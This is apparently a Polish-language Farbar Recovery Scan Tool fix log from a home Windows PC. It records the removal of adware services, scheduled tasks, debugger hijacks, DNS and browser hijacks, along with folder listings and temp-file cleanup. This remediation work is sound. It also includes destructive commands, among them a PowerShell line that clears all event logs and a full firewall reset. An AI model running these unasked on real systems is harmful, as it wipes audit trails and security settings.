pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E9BDE757-84E7-4207-9089-B095B2313ECD}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E9BDE757-84E7-4207-9089-B095B2313ECD}" => pomyślnie usunięto C:\Windows\System32\Tasks\{09097A47-090F-7A0F-0B11-0E090B7D1108} => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{09097A47-090F-7A0F-0B11-0E090B7D1108}" => pomyślnie usunięto C:\Users\ADMINI~1\AppData\Local\78EB64~1 => pomyślnie przeniesiono 
C:\Program Files\English To Chaser => pomyślnie przeniesiono "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\\KOMPUTER01" => pomyślnie usunięto
"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" => pomyślnie usunięto "HKU\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell" => pomyślnie usunięto "HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE" => pomyślnie usunięto "HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdate.exe" => pomyślnie usunięto "HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdaterService.exe" => pomyślnie usunięto "HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe" => pomyślnie usunięto C:\Windows\system32\GroupPolicy\Machine => pomyślnie przeniesiono C:\Windows\system32\GroupPolicy\GPT.ini => pomyślnie przeniesiono "HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\\NameServer" => pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8EF21497-7361-4F1C-A09C-A9A671FA6743}\\NameServer" => pomyślnie usunięto "HKU\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA}" => pomyślnie usunięto HKLM\Software\Classes\CLSID\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => klucz nie znaleziono HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość
pomyślnie przywrócono HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono HKU\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono HKU\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wartość pomyślnie przywrócono "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}" => pomyślnie usunięto HKLM\Software\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz nie znaleziono HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wartość pomyślnie przywrócono "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}" => pomyślnie usunięto HKLM\Software\Wow6432Node\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz nie znaleziono "HKU\S-1-5-21-478647955-3472351390-1182581596-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}" => pomyślnie usunięto HKLM\Software\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz nie znaleziono "Chrome HomePage" => pomyślnie usunięto "HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => pomyślnie usunięto "HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\WinCacheSrv" => pomyślnie usunięto WinCacheSrv => serwis pomyślnie usunięto Nie można przenieść "C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp" => Zaplanowany do przeniesienia przy restarcie. 
"HKLM\System\CurrentControlSet\Services\CornerSunshineSvc" => pomyślnie usunięto CornerSunshineSvc => serwis pomyślnie usunięto C:\Users\Public\Documents\report.dat => pomyślnie przeniesiono C:\Users\Public\Documents\temp.dat => pomyślnie przeniesiono C:\ProgramData\fjcfi => pomyślnie przeniesiono C:\ProgramData\chuvc => pomyślnie przeniesiono C:\Users\administratorka\AppData\Local\YdozKPUZep => pomyślnie przeniesiono C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Picasa 3.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverDoc\DriverDoc.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverDoc\Register DriverDoc.lnk => pomyślnie przeniesiono C:\Users\administratorka\Desktop\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\administratorka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox (2).lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\Users\Public\Desktop\Mozilla Firefox.lnk => pomyślnie przeniesiono 
C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk => pomyślnie przeniesiono C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk => pomyślnie przeniesiono C:\Users\administratorka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk => Skrót - argument pomyślnie przywrócono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\theHunter\theHunter.lnk => Skrót - argument pomyślnie usunięto C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox\Mozilla Firefox (Safe Mode).lnk => Skrót - argument pomyślnie usunięto C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox\Mozilla Firefox.lnk => Skrót - argument pomyślnie usunięto ========= dir /a "C:\Program Files" ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: CECA-4424 Katalog: C:\Program Files 2018-01-24 15:27 . 2018-01-24 15:27 .. 2016-07-17 21:39 AMD 2016-09-15 20:13 AVAST Software 2018-01-19 15:58 CCleaner 2017-10-24 20:01 Common Files 2009-07-14 05:54 174 desktop.ini 2011-04-12 14:32 DVD Maker 2016-07-07 20:47 GIGABYTE 2016-07-07 20:48 Intel 2016-07-09 11:49 Internet Explorer 2016-11-22 18:01 McAfee 2011-04-12 14:32 Microsoft Games 2009-07-14 06:32 MSBuild 2016-07-07 20:45 Realtek 2009-07-14 06:32 Reference Assemblies 2017-03-08 17:59 TrueKey 2009-07-14 06:09 Uninstall Information 2017-03-23 13:08 VideoLAN 2016-07-09 11:48 Windows Defender 2016-07-14 09:45 Windows Journal 2011-04-12 14:21 Windows Mail 2016-10-13 09:28 Windows Media Player 2016-07-07 19:29 Windows NT 2011-04-12 14:21 Windows Photo Viewer 2010-11-21 04:31 Windows Portable Devices 2011-04-12 14:21 Windows Sidebar 1 plik(ów) 174 bajtów 26 katalog(ów) 2 926 010 368 bajtów wolnych ========= Koniec CMD: ========= ========= dir /a "C:\Program Files (x86)" ========= Wolumin w stacji C nie ma etykiety.
Numer seryjny woluminu: CECA-4424 Katalog: C:\Program Files (x86) 2018-01-24 15:25 . 2018-01-24 15:25 .. 2017-05-17 10:03 Adobe 2016-07-07 20:51 AMD 2017-09-10 11:04 BFG 2017-05-27 09:22 BiaoJi 2017-11-24 13:48 Common Files 2016-10-01 09:29 Corner Sunshine 2009-07-14 05:54 174 desktop.ini 2018-01-12 12:42 DOSBox-0.74 2017-12-11 10:48 Drakensang Online 2016-07-08 09:53 DriverDoc 2016-07-17 20:43 DriverPack Notifier 2016-07-07 20:53 GIGABYTE 2017-12-25 19:24 Google 2016-07-30 17:44 Grupa IMAGE 2017-11-24 11:51 GtkSharp 2016-09-15 20:19 InstallShield Installation Information 2016-07-07 20:52 Intel 2016-07-09 11:49 Internet Explorer 2016-07-07 21:55 Java 2016-09-15 20:12 KYE 2017-09-26 08:43 McAfee 2017-11-24 14:10 Microsoft SDKs 2017-11-24 13:22 Microsoft Visual Studio 2017-11-24 14:10 Microsoft Visual Studio Tools for Unity 2017-11-24 13:48 Microsoft.NET 2017-09-25 10:40 Movie Maker 2.6 2017-05-21 08:54 Mozilla Firefox 2017-05-21 08:54 Mozilla Maintenance Service 2017-11-24 13:48 MSBuild 2017-12-23 16:20 Opera 2016-07-09 23:53 Origin Games 2016-07-07 20:45 Realtek 2009-07-14 06:32 Reference Assemblies 2017-09-10 10:59 ReflexiveArcade 2017-03-23 13:04 ScreenShot 2017-09-05 17:23 Skype 2018-01-24 13:00 Steam 2016-07-07 21:00 SymSilent 2016-09-14 22:07 Temp 2009-07-14 05:57 Uninstall Information 2016-07-09 11:48 Windows Defender 2017-11-24 13:48 Windows Kits 2011-04-12 14:21 Windows Mail 2016-10-13 09:28 Windows Media Player 2009-07-14 06:32 Windows NT 2011-04-12 14:21 Windows Photo Viewer 2010-11-21 04:31 Windows Portable Devices 2011-04-12 14:21 Windows Sidebar 2016-07-11 10:05 WinRAR 2016-09-19 06:54 WinSaber 1 plik(ów) 174 bajtów 51 katalog(ów) 2 926 010 368 bajtów wolnych ========= Koniec CMD: ========= ========= dir /a "C:\Program Files\Common Files\System" ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: CECA-4424 Katalog: C:\Program Files\Common Files\System 2016-07-09 19:50 . 2016-07-09 19:50 ..
2016-07-09 11:48 ado 2009-07-14 02:40 29 184 DirectDB.dll 2011-04-12 14:21 en-US 2016-07-09 11:48 msadc 2016-07-09 19:50 Ole DB 2011-04-12 14:21 pl-PL 2011-10-01 06:45 886 784 wab32.dll 2009-07-14 02:33 1 098 752 wab32res.dll 3 plik(ów) 2 014 720 bajtów 7 katalog(ów) 2 926 010 368 bajtów wolnych ========= Koniec CMD: ========= ========= dir /a "C:\Program Files (x86)\Common Files\System" ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: CECA-4424 Katalog: C:\Program Files (x86)\Common Files\System 2016-07-09 19:50 . 2016-07-09 19:50 .. 2016-07-09 11:48 ado 2009-07-14 02:15 24 064 DirectDB.dll 2011-04-12 14:21 en-US 2016-07-09 11:48 msadc 2016-07-09 19:50 Ole DB 2011-04-12 14:21 pl-PL 2011-10-01 05:37 708 608 wab32.dll 2009-07-14 02:11 1 098 752 wab32res.dll 3 plik(ów) 1 831 424 bajtów 7 katalog(ów) 2 926 010 368 bajtów wolnych ========= Koniec CMD: ========= ========= dir /a C:\ProgramData ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: CECA-4424 Katalog: C:\ProgramData 2018-01-24 15:27 . 2018-01-24 15:27 ..
2018-01-24 12:38 2e89a3 2018-01-23 00:38 3fed80ce-11f1-0 2018-01-23 00:38 3fed80ce-6ab7-1 2017-05-17 10:25 Adobe 2009-07-14 06:08 Application Data [C:\ProgramData] 2016-11-22 18:01 Ashampoo 2016-09-15 20:13 AVAST Software 2016-10-21 14:12 BaofengUpdate_U 2016-09-29 10:04 corss 2016-08-21 09:32 DAEMON Tools Lite 2016-07-07 19:29 Dane aplikacji [C:\ProgramData] 2009-07-14 06:08 Desktop [C:\Users\Public\Desktop] 2009-07-14 06:08 Documents [C:\Users\Public\Documents] 2016-07-07 19:29 Dokumenty [C:\Users\Public\Documents] 2016-09-15 19:55 DriverGenius 2016-07-09 23:28 Electronic Arts 2018-01-24 15:12 f595a9da-09e7-0 2018-01-23 10:45 f595a9da-27b7-1 2018-01-23 18:36 f595a9da-4f15-0 2018-01-24 12:37 f595a9da-5873-0 2018-01-23 18:36 f595a9da-6717-1 2018-01-23 12:34 f595a9da-7567-1 2018-01-24 12:36 f595a9da-7627-1 2018-01-23 12:35 f595a9da-77e3-0 2018-01-23 00:30 f595a9da-7951-0 2009-07-14 06:08 Favorites [C:\Users\Public\Favorites] 2016-07-29 00:10 Hunter 2016-07-07 20:48 Intel 2017-09-10 11:25 InterAction studios 2017-09-26 08:43 McAfee 2016-07-07 19:29 Menu Start [C:\ProgramData\Microsoft\Windows\Start Menu] 2018-01-18 00:25 Microleaves 2017-11-24 13:09 Microsoft 2016-09-14 22:07 16 mntemp 2016-09-14 22:07 4 927 mtbjfghn.xbe 2016-07-27 09:15 Norton 2016-07-07 20:58 NortonInstaller 2018-01-24 10:53 266 ntuser.pol 2016-07-07 21:55 Oracle 2016-10-06 22:18 Origin 2017-11-24 14:09 Package Cache 2016-07-07 19:29 Pulpit [C:\Users\Public\Desktop] 2016-09-01 22:14 Riot Games 2017-09-26 08:48 Screaming Bee 2016-08-21 09:27 sozy 2009-07-14 06:08 Start Menu [C:\ProgramData\Microsoft\Windows\Start Menu] 2016-07-07 19:29 Szablony [C:\ProgramData\Microsoft\Windows\Templates] 2009-07-14 06:08 Templates [C:\ProgramData\Microsoft\Windows\Templates] 2016-09-29 10:04 Tencent 2016-07-07 19:29 Ulubione [C:\Users\Public\Favorites] 2017-11-25 10:37 Unity 2018-01-19 13:55 UvConverter 2018-01-24 12:59 {1C91D9F2-96D3-5334-1015-CD768A5746B8} 2018-01-23 00:29 {2b155d02-712c-1} 2018-01-23 00:29
{69ee4733-212c-0} 3 plik(ów) 5 209 bajtów 54 katalog(ów) 2 926 006 272 bajtów wolnych ========= Koniec CMD: ========= ========= dir /a C:\Users\administratorka\AppData\Local ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: CECA-4424 Katalog: C:\Users\administratorka\AppData\Local 2018-01-24 15:27 . 2018-01-24 15:27 .. 2017-05-17 11:48 Adobe 2018-01-18 00:21 AdvinstAnalytics 2016-07-08 00:33 CEF 2018-01-24 10:54 CrashDumps 2016-07-30 11:20 CrashRpt 2016-07-07 19:29 Dane aplikacji [C:\Users\administratorka\AppData\Local] 2017-10-16 14:56 Diagnostics 2016-08-21 09:51 Disc_Soft_Ltd 2018-01-12 12:22 DOSBox 2018-01-24 15:21 ElevatedDiagnostics 2018-01-18 00:22 FastDataX 2016-07-10 09:28 58 016 GDIPFONTCACHEV1.DAT 2017-03-07 19:39 GG 2017-12-25 19:24 Google 2016-07-09 20:42 GWX 2016-07-07 19:29 Historia [C:\Users\administratorka\AppData\Local\Microsoft\Windows\History] 2018-01-24 00:56 7 741 806 IconCache.db 2017-03-08 17:17 Macromedia 2017-11-24 14:09 Microsoft 2017-02-06 21:27 Microsoft Games 2016-09-16 14:30 Mozilla 2017-03-28 10:11 NFS Underground 2 2017-05-20 01:02 OpenFM 2016-07-17 21:00 Opera Software 2016-07-09 23:53 Origin 2016-07-08 09:52 Programs 2017-01-04 12:19 PRO_PC_Cleaner 2017-11-24 13:21 ServiceHub 2017-09-25 10:23 SkypeVoiceChanger 2016-12-12 22:49 Steam 2017-03-03 22:14 TeamSpeak 3 2018-01-24 15:27 Temp 2016-07-07 19:29 Temporary Internet Files [C:\Users\administratorka\AppData\Local\Microsoft\Windows\Temporary Internet Files] 2016-07-30 11:20 theHunter 2017-11-25 10:37 Unity 2017-09-10 10:55 VirtualStore 2017-09-25 10:44 WMTools Downloaded Files 2 plik(ów) 7 799 822 bajtów 37 katalog(ów) 2 926 002 176 bajtów wolnych ========= Koniec CMD: ========= ========= dir /a C:\Users\administratorka\AppData\LocalLow ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: CECA-4424 Katalog: C:\Users\administratorka\AppData\LocalLow 2018-01-24 10:58 . 2018-01-24 10:58 ..
2017-05-17 11:48 Adobe 2017-03-08 17:17 Microsoft 2018-01-24 13:32 Mozilla 2016-07-07 21:44 Oracle 2016-07-07 21:55 Sun 2016-07-09 09:41 Temp 2017-11-25 10:37 Unity 0 plik(ów) 0 bajtów 9 katalog(ów) 2 926 002 176 bajtów wolnych ========= Koniec CMD: ========= ========= dir /a C:\Users\administratorkaAppData\Roaming ========= Nie można odnaleźć określonego pliku. ========= Koniec CMD: ========= ========= netsh advfirewall reset ========= Ok. ========= Koniec CMD: ========= ========= ipconfig /flushdns ========= Konfiguracja IP systemu Windows Pomyślnie opróżniono pamięć podręczną programu rozpoznawania nazw DNS. ========= Koniec CMD: ========= C:\Windows\System32\Drivers\etc\hosts => pomyślnie przeniesiono Hosts pomyślnie przywrócono. ========= wevtutil el | Foreach-Object {wevtutil cl "$_"} ========= ========= Koniec Powershell: ========= =========== EmptyTemp: ========== BITS transfer queue => 8388608 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 125390409 B Java, Flash, Steam htmlcache => 264063647 B Windows/system/drivers => 697152240 B Edge => 0 B Chrome => 325982 B Firefox => 311799294 B Opera => 224398850 B Temp, IE cache, history, cookies, recent: Users => 0 B Default => 66228 B Public => 0 B ProgramData => 0 B systemprofile => 58858282 B systemprofile32 => 66660 B LocalService => 66295 B NetworkService => 186560 B administratorka => 3061237205 B RecycleBin => 0 B EmptyTemp: => 4.4 GB danych tymczasowych Usunięto. ================================ Rezultat przenoszenia plików przy restarcie (Tryb startu: Normal) (Data i godzina: 24-01-2018 15:32:33) C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp => Nie można przenieść ==== Koniec Fixlog 15:32:33 ====